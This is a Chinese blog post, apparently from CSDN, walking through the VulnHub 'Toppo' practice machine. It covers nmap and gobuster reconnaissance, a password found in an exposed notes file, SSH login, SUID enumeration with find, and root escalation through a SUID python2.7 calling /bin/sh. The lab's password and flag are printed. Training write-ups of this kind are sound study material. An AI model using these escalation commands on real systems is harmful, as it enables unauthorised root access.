vulnhub(7):Toppo(经典的suid滥用提权)

最新推荐文章于 2024-10-31 17:14:12 发布
最新推荐文章于 2024-10-31 17:14:12 发布
阅读量853 收藏 10
点赞数 3
分类专栏: vulnhub oscp-like靶场 文章标签: 安全 网络 网络安全 web安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/anddddoooo/article/details/142221262
版权

端口

nmap主机发现
nmap -sn 192.168.6.0/24
​
Nmap scan report for 192.168.6.34
Host is up (0.00020s latency).
​
34是新出现的机器,他就是靶机
nmap端口扫描
nmap -Pn 192.168.6.34 -p- --min-rate 10000 -oA nmap/scan
扫描开放端口保存到 nmap/scan下
​
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
48230/tcp open  unknown
 
​
​
发现开放3个端口
nmap -sT -sC -sV -O -p22,80,111 -oA nmap/scan 192.168.6.34详细端口扫描:
-sT:完整tcp连接
-sC:默认脚本扫描
-sV:服务版本探测
-O:系统信息探测
​
PORT      STATE SERVICE VERSION                                                                      │
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)                                 │
| ssh-hostkey:                                                                                       │
|   1024 ec61979f4dcb759959d4c1c4d43ed9dc (DSA)                                                      │
|   2048 8999c4549a1866f7cd8eabb6aa312ec6 (RSA)                                                      │
|   256 60bedd8f1ad7a3f3fe21cc2f11307b0d (ECDSA)                                                     │
|_  256 39d97926603d6ca21e8b1971c0e25e5f (ED25519)                                                   │
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))                                               │
|_http-server-header: Apache/2.4.10 (Debian)                                                         │
|_http-title: Clean Blog - Start Bootstrap Theme                                                     │
111/tcp   open  rpcbind 2-4 (RPC #100000)                                                            │
| rpcinfo:                                                                                           │
|   program version    port/proto  service                                                           │
|   100000  2,3,4        111/tcp   rpcbind                                                           │
|   100000  2,3,4        111/udp   rpcbind                                                           │
|   100000  3,4          111/tcp6  rpcbind                                                           │
|   100000  3,4          111/udp6  rpcbind                                                           │
|   100024  1          48230/tcp   status                                                            │
|   100024  1          49352/udp   status                                                            │
|   100024  1          52407/udp6  status                                                            │
|_  100024  1          56532/tcp6  status 
​
分析:
22端口开放
80端口http服务
111 rpcbind

立足

80端口
一个博客网站,整个网站除了contact 界面,没有任何交互的地方,因此没有任何漏洞
​
尝试敏感信息收集
gobuster dir -u http://192.168.100.34/ -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html --add-slash 
​
/.php/                (Status: 403) [Size: 294]                                                      
/.html/               (Status: 403) [Size: 295]                                                      
/img/                 (Status: 200) [Size: 1775]                                                     
/icons/               (Status: 403) [Size: 295]                                                      
/mail/                (Status: 200) [Size: 948]                                                      
/admin/               (Status: 200) [Size: 937]                                                      
/css/                 (Status: 200) [Size: 1157]                                                     
/manual/              (Status: 200) [Size: 626]                                                      
/js/                  (Status: 200) [Size: 2045]                                                     
/vendor/              (Status: 200) [Size: 1343]
/.php/                (Status: 403) [Size: 294]                                                      
/.html/               (Status: 403) [Size: 295]                                                      
/server-status/       (Status: 403) [Size: 303]
​
分析:
mail和admin页面最有可能出现敏感信息,先看最敏感的

mail页面

mail页面是个文件目录,下面只有一个php文件:
contact_me.php
​
wget http://192.168.100.34/mail/contact_me.php
发现contact_me.php文件没有php代码,只有一行字符串:No arguments Provided!

admin页面

admin页面是个文件目录,下面只有一个txt页面:
notes.txt
​
打开发现这样信息:
Note to myself :
I need to change my password :/ 12345ted123 is too outdated but the technology isn't my thing i prefer go fishing or watching soccer .
​
从中我们获取密码12345ted123
获取密码后的思路
获取密码后,首先要想到获取用户名
获取用户名之后要想到要与服务器有交互,但是我们之前说过整个80端口除了contact 界面就没有任何交互,contact是发送邮箱的界面,尝试扫描不存在漏洞,也没有密码的交互,只能排除
​
所以如果获取到用户名列表和密码列表,唯一的操作只能是ssh爆破,我们现在唯一的问题就是获取一个用户名列表,并与我们收集到的密码匹配
收集用户名
靶机名称:Toppo
常用用户名:admin、root
从密码(12345ted123)中收集到的可能是用户的字符串:ted
尝试登陆ssh
用户名不多,手动尝试即可,发现
用户:ted
密码:12345ted123
可以登录ssh

提权

信息枚举
sudo -l:无此命令
cat /etc/passwd:没有新的信息
cat /etc/crontab:没有计划任务脚本
find / -type f -perm -u=s 2>/dev/null:
​
/sbin/mount.nfs
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/python2.7
/usr/bin/chsh
/usr/bin/at
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/procmail
/usr/bin/passwd
/bin/su
/bin/umount
/bin/mount
​
*有一个可能是管理员设置的/usr/bin/procmail,还有一个非常敏感的/usr/bin/python2.7
​
/usr/bin/procmail 运行没有回显,不管他
/usr/bin/python2.7 是最有可能提权的,基本上板上钉钉了
suid滥用提权
运行suid的程序时,这个程序的进程euid是创建者的用户id,且按照euid的权限执行进程代码,这意味着我们如果这个程序能调用/bin/sh,他的权限将会按照euid的身份新起一个拥有euid权限的会话shell
​
注:但是调用/bin/bash将不会提权,因为/bin/bash在启动后,首先判断euid和ruid是否相同,如果不相同,他会利用权限更低的ruid(如果ruid的权限比euid低),自动进行降权处理
​
ruid:真实用户ID表示发起该进程的用户。
euid:称为有效用户 ID,它表示系统用来确定进程权限的用户身份。
使用bash,会被自动降权处理
python -c 'import os;os.system("/bin/bash")'
bash-4.3$ cd /root
/root: Permission denied
​
使用sh,按照euid进行
python -c 'import os;os.system("/bin/sh")'
直接拿到root的flag: 0wnedlab{p4ssi0n_c0me_with_pract1ce}
anddddoooo
关注
专栏目录
Vulnhub - Toppo
qq_46081990的博客
03-14 457
根据/admin/notes.txt中泄露的ssh密码(12345ted123),猜测用户名为ted,使用Xshell成功连接,得到普通用户权限ted。这个靶场个人觉得设计的有点不切实际。另外,辅助探测脚本还检测到NOPASSWD的SUDO命令:/usr/bin/awk(通过cat /etc/sudoers也能查到)直接通过/usr/bin/python2.7反弹shell,Kali这边nc监听反弹,成功拿到root权限和flag。检测到可利用的SUID权限的文件:/usr/bin/python2.7。
Vulnhub:Toppo 1靶机
qq_43884092的博客
05-02 137
网站中的文件提示密码,cewl收集目标网站信息爆破ssh,拥有suid权限的python提权
vulnhub Toppo: 1
箭雨镜屋
05-22 422
渗透思路:nmap扫描---->nikto扫描发现可疑目录---->网站文件泄露ssh用户名和密码---->python命令suid提权
VulnHub-toppo
热门推荐
江左盟的博客
06-11 1万+
信息收集 漏洞发现 漏洞利用 q
软件测试最新看完这篇 教你玩转渗透测试靶机Vulnhub——Toppo 1,2024届毕业生还没找到软件测试开发工作
asdakdnfh的博客
05-14 394
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagmedium。
vulnhubToppo实战攻略
weixin_43862283的博客
04-14 639
vulnhubToppo实战攻略 0x01 前言 作为信息安全中新入围的小白,实战还是很重要的,就从最基础的开始咯!找了Vulnhub中菜鸟中的菜鸟做的,跟大家分享一下。 0x02 环境及配置 Toppo:1 难度 : Beginner 网卡配置:桥接模式 DHCP 下载地址:: https://download.vulnhub.com/toppo/Toppo.zip 0x03 攻击 第一步,...
看完这篇 教你玩转渗透测试靶机Vulnhub——Toppo: 1
Aluxian_的博客
09-21 618
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VMware或者Oracle VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:需要获得root权限找到flagmedium1.信息收集工具得使用2.suid提权得使用,这个靶机比较简单没啥新得知识点!🆗又是收获满满的一天最后创作不易,希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
Hack Toppo: 1:walkthrough【VulnHub靶场】渗透测试实战系列5
重新启程
12-09 685
靶场地址:Toppo: 1 难度:初级 先发现ip,扫描端口 root@kali:~# nmap -T5 -A -v 192.168.211.131 -p1-65535 Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-09 19:24 CST NSE: Loaded 151 scripts for scanning. NSE: Scri...
Vulnhub靶机练习——Toppo
weixin_45126664的博客
08-05 1047
这是一次靶场练习,使用 kali 和 VulnhubToppo靶机 ,难度属于新手入门 ! 靶机下载地址: 1、https://download.vulnhub.com/toppo/Toppo.zip 2、https://download.vulnhub.com/toppo/Toppo.zip.torrent 知识点: 1、netdiscover发现局域网内靶机IP地址 2、nmap扫描端口、服务、漏洞 3、dirb路径扫描 4、根据发现的端口(服务),尝试相应的探测和攻击 5、cewl搜集页面关
Vulnhub-CTF-Writeups:此备忘单针对CTF玩家和初学者,以帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章
05-28
Vulnhub-CTF-Writeups 该备忘单针对CTF玩家和初学者,可帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章。 我们已经根据我们的经验执行并编制了此列表。 请与您的联系分享此信息,并...
红队内网攻防渗透:内网渗透之Linux内网权限提升技术:suid&sudo
HACKONE的博客
06-02 254
SUDO权限是root把本来只能超级用户执行的命令赋予普通用户执行,系统管理员集中的管理用户使用权限和使用主机,配置文件:/etc/sudoers,除此配置之外的问题,SUDO还有两个CVE漏洞(CVE-2019-14287 CVE-2021-3156)。git源码泄露 => 找到数据库密码,登入 => 找到cms后台用户密码,改为已知密码 => 登入cms后台,写shell(低权限)2、suid、sudo、nfs、path、ld_preload、cron、lxd、capability、rbash等。
黑客零基础第二章--信息收集第五章-靶机实战Toppo:1
ShadowBlade
08-14 2969
Toppo:1是Vulnhub中easy的一个靶机,仅仅需要简单的信息收集,即可完成intrusion。非常适合我们的这一阶段练习
和oscp相似的靶机-hackthebox & vulnhub (OSCP-LIKE HACKTHEBOX & VULNHUB)
冬萍子癸水
04-06 3228
每台都做一做,然后记录在博客里.供自己和大家一起学习.
基于 SM3 的密钥派生函数 (KDF):国密合规的安全密钥生成方案
A_Lonely_Smile的博客
10-29 735
在现代加密技术中,密钥派生函数(Key Derivation Function, KDF)是一个将初始输入(如密码、共享密钥等)转换为安全密钥的过程,用于实现加密、消息认证等密码操作。特别是在符合国密标准的场景中,基于 SM3 的 KDF 已成为一种常用的密钥生成方式。本文将详细讲解 SM3-KDF 的工作原理,逐步介绍其实现过程,并提供 Java 代码示例,帮助您理解如何在项目中应用 SM3-KDF。
安全知识见闻-脚本语言对与安全的重要性
2201_75446043的博客
10-27 1169
批处理文件是以.bat扩展名结尾的文本文件,其中包含一系列命令,通常用于自动化任务。在Windows操作系统中,批处理文件可以通过命令提示符(CMD)运行。PowerShell是微软推出的一种任务自动化和配置管理框架,结合了命令行界面和脚本语言的特性。它的命令称为“cmdlet”,支持对象导向,能够处理复杂的数据结构。编写宏病毒、脚本病毒、BIOS病毒或进行内网渗透都需要特定的技术知识和编程技能,类似的脚本病毒还有很多,无法一一列举。
服务攻防之开发组件安全
qq_63831588的博客
10-28 1183
log4j 是 Apache 的一个开源日志库,是一个基于 Java 的日志记录框架,Log4j2 是 log4j 的后继者,其中引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI 组建等,被应用于业务系统开发,用于记录程序输入输出日志信息,log4j2 中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞,成功利用该漏洞可在目标服务器上执行任意代码。
API接口开放与安全管控 - 原理与实践
whisperzzza的博客
10-27 1330
API安全是接口开放的前提条件 在API对外开放时,确保其安全性至关重要,因为API直接暴露给外部环境,容易成为攻击目标。一旦被恶意利用,可能导致数据泄露、服务滥用等严重后果。因此,通过API网关实施严格的接口安全管理措施,如身份验证、访问控制和流量限制,成为保护后端服务免受威胁的第一道防线。这不仅有助于维护系统的稳定性和可靠性,还能增强用户对平台的信任度。
【 纷享销客-注册安全分析报告-无验证方式导致安全隐患】
最新发布
10-31 520
纷享销客(北京易动纷享科技有限责任公司)总部位于北京市海淀区中关村,目前在北京、上海、广州、深圳、杭州、南京、武汉、成都、长沙、郑州、西安、济南、香港等13个城市设立直营省分公司,在全国50余个城市建立营销服务中心。截至目前,员工总数1000余人,产品研发团队300余人,是一家具备完善的研发、实施交付能力的优质SaaS企业。纷享销客以连接型CRM为特色,连接业务,连接人,连接系统,实现以客户为中心,企业内部和上下游业务的高效协作。
【商汤科技-注册/登录安全分析报告】
10-26 1600
作为人工智能软件公司,商汤科技以“坚持原创,让AI引领人类进步”为使命,旨在持续引领人工智能前沿研究,持续打造更具拓展性更普惠的人工智能软件平台,推动经济、社会和人类的发展,并持续吸引及培养顶尖人才,共同塑造未来。商汤科技拥有深厚的学术积累,并长期投入于原创技术研究,不断增强行业领先的多模态、多任务通用人工智能能力。
uaGate SI——实现OT与IT的安全连接
SoftingChina的博客
10-28 774
对于许多制造商来说,诸如工业物联网(IIoT)、信息物理系统(CPS)和大数据等概念已经开始与其智能工厂的愿景紧密相连。智能工厂是将信息技术(IT)的数字世界与运营技术(OT)的物理世界连接起来,也就是实现IT与OT的融合。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值